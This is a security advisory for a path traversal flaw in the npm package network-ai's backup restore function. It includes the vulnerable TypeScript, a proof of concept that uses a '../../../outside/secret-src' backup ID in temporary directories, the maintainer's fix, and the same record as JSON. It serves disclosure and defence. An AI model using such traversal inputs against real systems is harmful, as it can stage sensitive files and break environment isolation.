GHSA-48X2-6PR9-2JJF

Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42
VLAI
Summary
Network-AI: EnvironmentManager.restore() backup ID path traversal copies arbitrary directories into environment data
Details

Summary

EnvironmentManager.restore(env, backupId) computes the backup path with join(envDir, '.backups', backupId) and only checks that this path exists. It does not resolve the result or verify that it remains under data/<env>/.backups.

A caller can pass a traversal backup ID such as ../../../outside/source-dir to restore files from an arbitrary directory into the target environment data directory. Confirmed in Network-AI 5.12.1.

Details

restore() builds backupPath directly from caller-controlled backupId:

restore(env: EnvName, backupId: string): RestoreResult {
  const envDir = this.getDataDir(env);
  const backupsDir = join(envDir, '.backups');
  const backupPath = join(backupsDir, backupId);

  if (!existsSync(backupPath)) {
    throw new Error(`Backup '${backupId}' not found for environment '${env}'`);
  }

  this.backup(env);

  const files = this._collectBackupFiles(backupPath);
  let restored = 0;
  for (const rel of files) {
    if (rel === '_manifest.json') continue;
    const src = join(backupPath, rel);
    const dst = join(envDir, rel);
    try {
      mkdirSync(join(envDir, rel.includes('/') ? rel.substring(0, rel.lastIndexOf('/')) : '.'), { recursive: true });
      copyFileSync(src, dst);
      restored++;
    } catch { /* skip */ }
  }

  return { backupId, env, filesRestored: restored };
}

There is no resolved containment check that ensures backupPath remains under backupsDir.

Default CLI reachability exists through network-ai env backup restore --env <env> --backup <id>.

Affected source evidence:

  • lib/env-manager.ts:474-499 — vulnerable restore path construction and copy.
  • bin/cli.ts:441-458 — default CLI exposes restore with caller-controlled --backup.

PoC

This PoC uses only temporary directories and restores trust_levels.json from an external directory into data/dev:

TMP=$(mktemp -d)
TMPBASE="$TMP" node -r ts-node/register/transpile-only - <<'TS'
const { EnvironmentManager } = require('./lib/env-manager');
const fs = require('fs');
const path = require('path');
const base = process.env.TMPBASE;
const data = path.join(base, 'data');
const source = path.join(base, 'outside', 'secret-src');

fs.mkdirSync(source, { recursive: true });
fs.writeFileSync(path.join(source, 'trust_levels.json'), '{"leaked":true}');

const mgr = new EnvironmentManager(data, {
  chain: ['dev', 'st'],
  gates: { dev: 'auto', st: 'auto' },
});

mgr.init('dev');
const backupId = path.relative(path.join(data, 'dev', '.backups'), source);
const result = mgr.restore('dev', backupId);
const restored = fs.readFileSync(path.join(data, 'dev', 'trust_levels.json'), 'utf8');

console.log(JSON.stringify({ backupId, filesRestored: result.filesRestored, restored }, null, 2));
fs.rmSync(base, { recursive: true, force: true });
TS

Observed result includes backupId: "../../../outside/secret-src", filesRestored: 1, and restored content {"leaked":true}.

Impact

A caller that can invoke backup restore can copy arbitrary readable directories into data/<env>, subject to process filesystem permissions. This can stage sensitive files into environment data/backup locations, overwrite environment configuration files if matching filenames exist, and break environment isolation. No RCE chain was confirmed.


Resolution (maintainer)

Fixed in v5.12.2 (commit a59c13a). Install: npm install network-ai@5.12.2 — published to npm with provenance.

restore() now validates backupId against /^[\w\-]+$/ and asserts dirname(resolve(join(backupsDir, backupId))) === resolve(backupsDir) before touching the filesystem. Backup IDs containing path separators or .. are rejected, so a crafted ID can no longer copy directories from outside .backups/ into the environment.

All 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.12.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "network-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:42:38Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`EnvironmentManager.restore(env, backupId)` computes the backup path with `join(envDir, \u0027.backups\u0027, backupId)` and only checks that this path exists. It does not resolve the result or verify that it remains under `data/\u003cenv\u003e/.backups`.\n\nA caller can pass a traversal backup ID such as `../../../outside/source-dir` to restore files from an arbitrary directory into the target environment data directory. Confirmed in Network-AI 5.12.1.\n\n### Details\n`restore()` builds `backupPath` directly from caller-controlled `backupId`:\n\n```ts\nrestore(env: EnvName, backupId: string): RestoreResult {\n  const envDir = this.getDataDir(env);\n  const backupsDir = join(envDir, \u0027.backups\u0027);\n  const backupPath = join(backupsDir, backupId);\n\n  if (!existsSync(backupPath)) {\n    throw new Error(`Backup \u0027${backupId}\u0027 not found for environment \u0027${env}\u0027`);\n  }\n\n  this.backup(env);\n\n  const files = this._collectBackupFiles(backupPath);\n  let restored = 0;\n  for (const rel of files) {\n    if (rel === \u0027_manifest.json\u0027) continue;\n    const src = join(backupPath, rel);\n    const dst = join(envDir, rel);\n    try {\n      mkdirSync(join(envDir, rel.includes(\u0027/\u0027) ? rel.substring(0, rel.lastIndexOf(\u0027/\u0027)) : \u0027.\u0027), { recursive: true });\n      copyFileSync(src, dst);\n      restored++;\n    } catch { /* skip */ }\n  }\n\n  return { backupId, env, filesRestored: restored };\n}\n```\n\nThere is no resolved containment check that ensures `backupPath` remains under `backupsDir`.\n\nDefault CLI reachability exists through `network-ai env backup restore --env \u003cenv\u003e --backup \u003cid\u003e`.\n\nAffected source evidence:\n\n- `lib/env-manager.ts:474-499` \u2014 vulnerable restore path construction and copy.\n- `bin/cli.ts:441-458` \u2014 default CLI exposes restore with caller-controlled `--backup`.\n\n### PoC\nThis PoC uses only temporary directories and restores `trust_levels.json` from an external directory into `data/dev`:\n\n```bash\nTMP=$(mktemp -d)\nTMPBASE=\"$TMP\" node -r ts-node/register/transpile-only - \u003c\u003c\u0027TS\u0027\nconst { EnvironmentManager } = require(\u0027./lib/env-manager\u0027);\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\nconst base = process.env.TMPBASE;\nconst data = path.join(base, \u0027data\u0027);\nconst source = path.join(base, \u0027outside\u0027, \u0027secret-src\u0027);\n\nfs.mkdirSync(source, { recursive: true });\nfs.writeFileSync(path.join(source, \u0027trust_levels.json\u0027), \u0027{\"leaked\":true}\u0027);\n\nconst mgr = new EnvironmentManager(data, {\n  chain: [\u0027dev\u0027, \u0027st\u0027],\n  gates: { dev: \u0027auto\u0027, st: \u0027auto\u0027 },\n});\n\nmgr.init(\u0027dev\u0027);\nconst backupId = path.relative(path.join(data, \u0027dev\u0027, \u0027.backups\u0027), source);\nconst result = mgr.restore(\u0027dev\u0027, backupId);\nconst restored = fs.readFileSync(path.join(data, \u0027dev\u0027, \u0027trust_levels.json\u0027), \u0027utf8\u0027);\n\nconsole.log(JSON.stringify({ backupId, filesRestored: result.filesRestored, restored }, null, 2));\nfs.rmSync(base, { recursive: true, force: true });\nTS\n```\n\nObserved result includes `backupId: \"../../../outside/secret-src\"`, `filesRestored: 1`, and restored content `{\"leaked\":true}`.\n\n### Impact\nA caller that can invoke backup restore can copy arbitrary readable directories into `data/\u003cenv\u003e`, subject to process filesystem permissions. This can stage sensitive files into environment data/backup locations, overwrite environment configuration files if matching filenames exist, and break environment isolation. No RCE chain was confirmed.\n\n\n---\n\n### Resolution (maintainer)\n\n**Fixed in [v5.12.2](https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2) (commit `a59c13a`).** Install: `npm install network-ai@5.12.2` \u2014 published to npm with provenance.\n\n`restore()` now validates `backupId` against `/^[\\w\\-]+$/` and asserts `dirname(resolve(join(backupsDir, backupId))) === resolve(backupsDir)` before touching the filesystem. Backup IDs containing path separators or `..` are rejected, so a crafted ID can no longer copy directories from outside `.backups/` into the environment.\n\nAll 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.",
  "id": "GHSA-48x2-6pr9-2jjf",
  "modified": "2026-06-19T21:42:38Z",
  "published": "2026-06-19T21:42:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-48x2-6pr9-2jjf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/commit/a59c13a1f0ce0e8a0779a90343eef92fac5ab4c3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Jovancoding/Network-AI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Network-AI: EnvironmentManager.restore() backup ID path traversal copies arbitrary directories into environment data"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…